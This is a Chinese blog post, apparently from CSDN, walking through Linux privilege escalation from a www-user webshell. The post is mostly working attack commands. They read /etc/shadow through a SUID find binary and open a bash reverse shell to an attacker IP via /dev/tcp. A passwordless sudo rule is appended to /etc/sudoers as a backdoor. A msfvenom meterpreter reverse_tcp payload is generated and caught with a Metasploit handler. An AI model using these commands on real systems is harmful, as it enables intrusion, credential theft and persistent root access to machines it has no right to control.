linux的一些提权方式

一、find命令提权+sudo提权

        在搭建场景时候,蚁剑上线后发现是www用户,限制好大,修改一些东西使他能够提权

  1. 先在机器中给 /usr/bin/find 赋予“u+s”的权限,这个是find命令的默认位置
  2. 有s 表示可以提权
  3. 此时可以直接执行命令

    find /usr/bin/find -exec cat /etc/shadow \;

    查看普通用户没有权限查看的文件

  4. 接下来可以开通监听,获取反弹shell

  5. nc -lvvnp 9919

  6. #!/bin/bash
    # This is a comment - it will be ignored by the shell
    
    # This is a command that will be executed
    find /etc/passwd -exec bash -ip >& /dev/tcp/攻击机IP/9919 0>&1 \;
    
    ##(注:最后一行代码可以直接执行的,但是我在蚁剑上执行不成功,所以写成脚本来用)
    

  7. 可以看到此时我们并不是完全的root权限,但是编辑权限是够的,接下来为www用户组做sudo免密,使用echo将内容加入到/etc/sudoers文件中

  8. echo '%www ALL=(ALL:ALL)   NOPASSWD:ALL' >> /etc/sudoers

  9. 再开一个监听,并重新上传新脚本zxcv,然后使用sudo执行zxcv文件

  10. #!/bin/bash
    # This is a comment - it will be ignored by the shell
    # This is a command that will be executed
    find /etc/passwd -exec bash -ip >& /dev/tcp/攻击机IP/9914 0>&1 \;

  11. 铛铛,此时就是root权限了

  12. 后面还可以往蚁剑上面上传msf木马,然后在这里执行文件,这一msf也用以root用户权限上线了

  13. # 生成msf木马
    msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=攻击机IP lport=7777 -f elf > 4.elf
    
    # 开启msf监听
    use exploit/multi/handler
    set payload linux/x64/meterpreter/reverse_tcp
    set lhost 攻击机IP
    set lport 7777
    run
    

  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值